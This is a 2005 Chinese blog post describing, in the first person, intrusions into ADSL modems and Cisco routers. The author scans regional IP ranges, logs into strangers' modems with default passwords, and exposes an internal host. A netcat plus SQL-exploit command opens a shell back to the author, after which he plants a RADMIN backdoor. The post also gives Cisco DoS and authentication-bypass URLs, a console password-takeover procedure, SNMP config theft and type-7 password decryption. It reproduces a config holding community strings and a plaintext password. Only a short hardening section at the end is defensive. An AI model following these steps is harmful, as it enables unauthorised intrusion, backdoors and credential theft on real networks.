让硬件入侵不再是神话

 http://blog.csdn.net/allyesno/archive/2005/11/27/538043.aspx

  现在的入侵手法莫过于一些简单的sql injection填字游戏，这样下去很单调。我最近在研究硬件方面的入侵，也了解了一些从adsl modem和cisco路由器的入侵手法，不敢独享。本文也主要是提供一些具体过程，起个抛砖引玉作用。

一、         从adsl modem的入侵

1． 扫描

现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了，开23、80的主机还真不小啊：）我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER:adsl PASS:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234），Bingo！一矢中的，现在我就是上帝。

 

图一、华硕adsl modem主页面

2． 映射

本来我们来到图一所示，拿一下上网密码就OK了。但是我们希望要入侵内网，这里只仅仅成功了一半。要进一步入侵内网，我们要进行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？开始，我选择了猜测。一般来说，MODEM的内网IP缺省是192．168．1．1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192．168．1．2的端口映射出来就行了（但如果使用了dhcp就麻烦了）。后来，我发现华硕的doc/lan_conf.htm配置页面已经记载了所有我们想要得到的信息。如图二。

 

图二、内网配置架构

我们从这里里面可以看出，adsl modem已经配置了dhcp。我们知道dhcp服务是一个自动分配IP地址的网络服务。我们知道DHCP有个特性就是按顺序分配，而且按照一般家庭网络，最多就几台计算机。据分析，可能存在主机IP地址为192.168.0.110、192.168.0.111两台主机。我们这里直接按照192.168.0.110来做实验。但是192.168.0.110到底开放了什么端口，我们根本就不知道啊，呵呵，既然不知道，那么我就把他整台主机透明地映射到外网。具体做法如下：进入NAT选项---添加NAT规则---BIMAP---填入主机IP：192．168．0．110，到此192．168．0．110已经透明地映射到192．168．0．1上了，我们访问ADSL MODEM就等于访问主机192．168．0．110了，如图三。

 

图三、添加映射规则

3. 检测漏洞

   现在我们再请出SUPPERSCAN或者其他扫描器对218．xxx．xxx．xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口有很多，刚才只是开放了80 23 21 而已（也就是说我们的映射已经成功了,另外发现里面有很多误报，不知道是什么原因？其中一部分端口开放是正常的）。该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员水平还不算低啊，（不过大部分安全系数比较低的主机还是存在安全漏洞的），如图四。

图四、superscan后期扫描结果

4. 溢出

　既然没有弱口令，也没开80，那只好从溢出方面着手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行，再利用了一下ms05-024漏洞攻击程序还是不成功的，（其实用什么溢出工具可以自己定，有很多主机是可以直接溢出的）。

5. 募然回首，那人却在，灯火阑珊处

看起来这管理员还是比较负责的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？）心动不如行动，现在只好死马当活马医了，于是，在cmd行中打入：

Nc –v –l 99 sql2 218.xxx.xxx.xxx 0 xxx.xxx.xxx.xxx 99

Bingo！成功地得到一个shell了。

6. 设置后门

　　到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的。呵呵，这里不详谈了，相信各位都知道。至于别的后门办法，请查看其他的文章。

 

 

 

二、           从cisco路由器入侵

Cisco路由器是现在网络中有的最多的一个节点。路由器是组成Internet的重要组件，所以他的安全性影响到整个网络,除cisco外还有一些比如华为的路由器和交换机在电信部门也是用的比较多的，这里只以cisco为例。

现在cisco都是用的CISCO IOS软件，也就是路由器的操作系统。从他的IOS来看，并不是一个健壮的体系。一般入侵cisco 路由器会用到下面的方法。

（1）一些理论基础

*    IOS自身欺骗

Cisco路由器是用IOS系统来实现路由的细节功能，因此它是路由系统的灵魂。Show命令的在线系统方式却为我们打开一个偷窥之门。

众所周知，Cisco路由器中，一般用户只能查看路由器的很少信息。而能进入特权模式的用户才有资格查看全部信息和修改路由。一般模式下，show的在线帮助系统不会列表所有可用的命令，虽然75个show的扩展参数只能用于特权模式下(enable)，实际上只有13个受到限制。这意味着一般用户（非特权用户）可以查看访问列表或其他路由安全相关信息。

重要安全相关的ACL信息可以被登录路由的非特权用户查看，诸如：

#show access-lists  // 显示当前所有 ACL 的内容

#show ip prot   //显示活动路由协议进程的参数和当前状态

#show ip ospf dat  //显示ospf数据库

#sh ip eigrp top  //显示EIGRP列表

等命令可以在非特权模式下泄露网络敏感信息。通过这些命令，我们能得出路由器配置的大致情况，这对采取进一步的入侵起到辅助作用。不过由于这种方式需要用户已经有一个登录帐户，因此得到这样的信息有一定难度。

* WCCP暗道

Cisco在IOS 11.2版本中引入WCCP(Web Cache Control Protocol)，为Cisco缓存引擎提供协议通信。Cisco缓存引擎为www提供透明缓存服务。缓存引擎用WCCP来和其他cisco路由器通信。路由器把HTTP数据发送到缓存引擎主机中。

虽然这种方式默认是关闭的。假如使能(enable)的话，那么WCCP本身是没有认证机制的。路由器将会把每一个发送合法缓存引擎类型的Hello包的主机认为缓存引擎，于是把HTTP数据缓存到那台主机。这意味着恶意用户可以通过这种方式获取信息。

通过这种方式，攻击者可以截获站点认证信息，包括站点密码；替代实际WEB内容为自己设计的陷阱；通过路由彻底破坏Web提供的服务。这种方式，可以完全规避登录烦琐的攻击方法，对Web提供全面而且致命的打击。

我们既可关闭WCCP的启用机制，也可通过ACL阻止WCCP发送HTTP流量给不信任主机来防止这样的恶劣情况发生。

*    HTTP服务的困惑

   Cisco在IOS版本加入了远程管理路由的Web特性，这对于新羽(newbie)的管理员来，无疑是值得高兴的事情。但引入方便的同时，隐患也随之进入。

１．基于拒绝式服务攻击的HTTP的漏洞

　　Cisco路由启用(enable)远程WEB管理，很容易遭受DoS。这种DoS能导致路由器停止对网络请求的响应。这是功能是Cisco路由的内嵌功能。但启用这个特性，通过构造一个简单的Http请求就会造成DoS攻击：

http://<router-ip>/%%

这种请求导致路由停止响应，甚至引起路由器执行硬重置(hard reset)。

２．基于HTTP服务器查询的漏洞

Cisco 安全建议小组在2000年10月30日公布了这个漏洞。IOS 11.0引入通过Web方式管理路由。”?”是HTML规范中定义的CGI参数的分界符。它也被IOS命令行接口解释成请求帮助。在IOS 12.0中，当问号邻接于”/”，URL解释器就不能正确解释其含义。当一个包括”?/”的URL对路由器HTTP服务器进行请求，并且提供一个有效的启用口令，则路由器进入死循环。因而引起路由崩溃并重起。

如果http起用，浏览 http://route_ip_addr/anytest?/

并且提供特权口令，则可以导致DoS攻击，导致路由停机或者重启。 除了让路由死亡之外，Http额外提供了一种可怕权限提升的漏洞，如下所论。

３．Cisco IOS 认证漏洞

　　当HTTP服务器启用并且使用本地用户认证方式。在某些条件，可以绕过认证并执行设备上的任何命令。用户可以对设备完全的控制。所有命令都将以最高特权执行(level 15)。

使用username 和password的路由设备帐户认证方式，构造如下URL：

http://router_ip_addr/level/xx/exec/….

（注：xx代表16至99之间的84种不同的组合攻击，因为路由器硬件类型众多，而IOS版本也存在不同，因此针对不同的路由器类型，攻击组合数字不同。）

通过这种方式，攻击者可以完全控制路由并可以改变路由表配置。这种可怕的事实让网管也感到惊悸。这种完整的控制方式将是网站数据通信枢纽的致命一击。 虽然Http漏洞带来如此之多的漏洞，但这种漏洞最主要原因是因为启用http服务器管理路由的缘故，由于这种管理是种命令行方式的替代物，因此对于熟练的网管来说，没有必要启动这种危害性很大的服务。

#no ip http server　的路由配置也成为时髦的安全配置语句。

（2）常见入侵方法

########本地密码劫持

　在所有入侵中，这种类型的入侵活动可谓是蓄谋以久的野蛮做法。方法本来的意图是用于管理员忘记密码后的恢复措施。而技术做为双刃剑的一面，便在于我们如何使用它。

　如果你有一台笔记本电脑，你有一根与路由器相应类型的连接线，那么你配备了入侵路由的武器。剩下的时间，你将思考如何闭开网管的眼睛，把连接线与路由器连接。以后的动作，需要你行动迅速了。(以25xx系列路由为例)

１．切断路由器的电源。

２．连接计算机与路由器。

３．打开超级终端(CTL-Break in Hyperterm)。

４．在启动路由器的30秒时间内，迅速按CTL-Break组合键，使路由器进入rom monitor 状态，出现提示符如下：

Followed by a '>' prompt...

５．输入 O/R 0x2142，修改配置注册器(config register)路由器从Flash

memory引导。

６．输入I，路由器初始化设置后重新启动。

７．输入系统配置 对话提示符敲no,一直等提示信息显示： Press RETURN to get started。

８．输入enable 命令，出现Router# 提示符。

这是，我们可以完全使用show命令查看路由中的一切配置，并可转储到计算机上。如果使用了enable的加密方式，虽然现在无法看，但可以使用工具进行破解。当然，粗鲁的做法是直接修改：

Router#conf term   ---à>配置终端

Router(conf)#enable password 7 123pwd  ----à>配置enable密码

 

 

 

进行完以上*作，别忘了恢复路由的正常状态，否则网管很快就能发现问题所在：

Router(conf)#config-register 0x2102   ---à>>>配置寄存器值0x2102

Router(conf)#exit    ----à>退出

 ########获取cisco配置文件

   众所周知，cisco有个配置文件，这个文件可以说是路由工作的核心，让路由知到该干嘛？

怎么干？如果你有了这个文件，我可以说你成功了80%。怎么才能得到这个文件了呢，方法很多了 ：

1 通过SNMP得道，这样是最常用的，我想用过SNMP的人会知道怎么做了，就不多说了！

2 攻击TFTP服务器，要得到的就是CISCO配制文件的存取权限

3 监视发往CISCO TAC的邮件（也是CISCO技术助理中心）

因为一般路由出了问题，都要求发出配置文件的。。。

4 还有很多方法，我记的以前黑白也有这么一篇文章，不过我不暂成大家用那种方法，太危险了！！！如果要知道的，可以和我联系。

5 还有很办法，那包括社会工程学。

   上面只是一些思路，具体过程我这里不赘述了。下面就具体阐述solarwinds2001得到CISCO密码过程。

   solarwinds2001是个集多种功能于一身的cisco管理工具，界面友好。工具条如下图5所示，酷似QQ，清晰明了，如图5。

 

图5、solarwinds2001界面图

 

图6、设置关键字private

打开Cisco Tools/IP Network Browser，设置关键字如图6，界面设置如图7。

 

图7、cisco network browser

  随便，在图7中填入一段IP地址进行扫描，扫描后，如果发现cisco路由器，会显示如下图8：

 

图8、扫描到了cisco路由器

现在我们可以用Cisco Tools/Download Config来下载这台cisco路由器的配置文件。如图9所示：

 

图9、下载配置文件

   好了。现在可以利用Cisco Tools/Config Editor&viewer打开下载好的config文件，如下是我下载的一份配置文件（部分略去）：

!#show running-config    ---à>>配置环境
version 11.2      ---à>>> IOS版本
no service pad  
no service udp-small-servers
no service tcp-small-servers
!
hostname HGHLNDSWSTWD.07.IDF1A.DSW08 ---à>>>配置主机名
!
enable secret 5 $1$ukn/$LU0yrd7/YBqBNJRDlIVes.--->>>>配置enable secet 密码(加密过)
!
!
ip subnet-zero --à>>0子网
!
!
interface VLAN1
ip address ***.11.111.8 255.255.255.192   ----à>>配置ip地址
no ip route-cache    ----à>无路由缓存
!
interface FastEthernet0/1     -----à>以下配置e0/1接口
description Port connected to Apt# 7307
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/2      ---à>以下配置e0/2接口
description Port connected to Apt# 7308
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/3        --à>>以下配置e0/3接口
description Port connected to Apt# 7309
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/4    --à>>以下配置e0/4接口
description Port connected to Apt# 7310
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/5     --à>>以下配置e0/5接口
description Port connected to Apt# 7311
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/6      --à>>以下配置e0/5接口
description Port connected to Apt# 7337
port security max-mac-count 1
no port security action trap
。。。。。。。。。。。略去
ip default-gateway ***.11.111.*    ------à配置默认网关
mac-address-table secure 0001.0235.5a4e FastEthernet0/2 vlan 1
snmp-server community N3tw0rk RO    ---à>snmp社区N3tw0rk
snmp-server community private RW     --àsnmp社区private（重要）
snmp-server community public RO      --àpublic
snmp-server chassis-id 0x0F
!
line con 0      ---àconsole 0
stopbits 1
line vty 0 4
password MDU!Admin -->>>>配置passwd,明文口令，未作加密处理！！
login
line vty 5 9
password 7 15110E1E2A2F3F---à>>关键所在
login
!
end

最后大家有没有看到这行：

password 7 15110E1E2A2F3F这就是密码了，这个可是是加过密的。

CISCOＩＯＳ有三种口令类型 ０口令，这个不用说了是明文的。 ７口令，就是我们那行看到的那个，有没看到那个７，就是了，现在一般都用这个。 ５口令，这个就比较麻烦了，是用ＭＤ５哈希算法加密的。

如果配置文件中口令经"Service password_encryption"命令加密，比如说这里出现“password 7 15110E1E2A2F3F”类的，用Cisco Tools/Router Password decryption.解密，如图10所示。

 

图10、solarwinds2001自带解密工具解密结果

   之后，我们就可以telnet进去了，而且拥有enable权限，这样我们就无所不能了，注意如果要进一步入侵内网节点，还需要入侵cisco交换机。

三．安全建议

  综上，我们网络管理员平常在管理的过程中不仅要注意到软件的安全也要注意到一些硬件的安全。比如在adsl modem方面：我们应该禁止对外通讯端口23、80、21。

对于cisco路由器我们可以有下面的解决办法：

1． 通过no ip http server取消http服务，消除Http带来的隐患

2． 限制SNMP访问配置 ，access-list 10 permit 204.50.25.0 0.0.0.255snmp-server community readwrite RW 10 (通过ACL限制受信主机访问)###########监测非授权的SNMP访问配置##########snmp-server enable traps (设置陷阱)snmp-server trap-authentication （如何认证失败，告诉路由发送陷阱。）snmp-server host 204.50.25.5 (陷阱消息接受工作站)（注：ciscoworks 工作站可以截获这些信息。）

3． 及时升级Cisco的IOS程序或者修补程序。

4． 推荐阅读RAT中的RSCG文档建议.。

5． 利用安全工具对路由进行安全检查。

   关于安全的建议问题，不是一劳永逸的事情，漏洞在暗处挖掘着，新的技术在不断膨胀着，因此以上的几点建议只作为参考，实际的运用当中我们应该根据实际情况作出正确的策略。

-------------------------------------

   文章未刊登！请自重

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=538043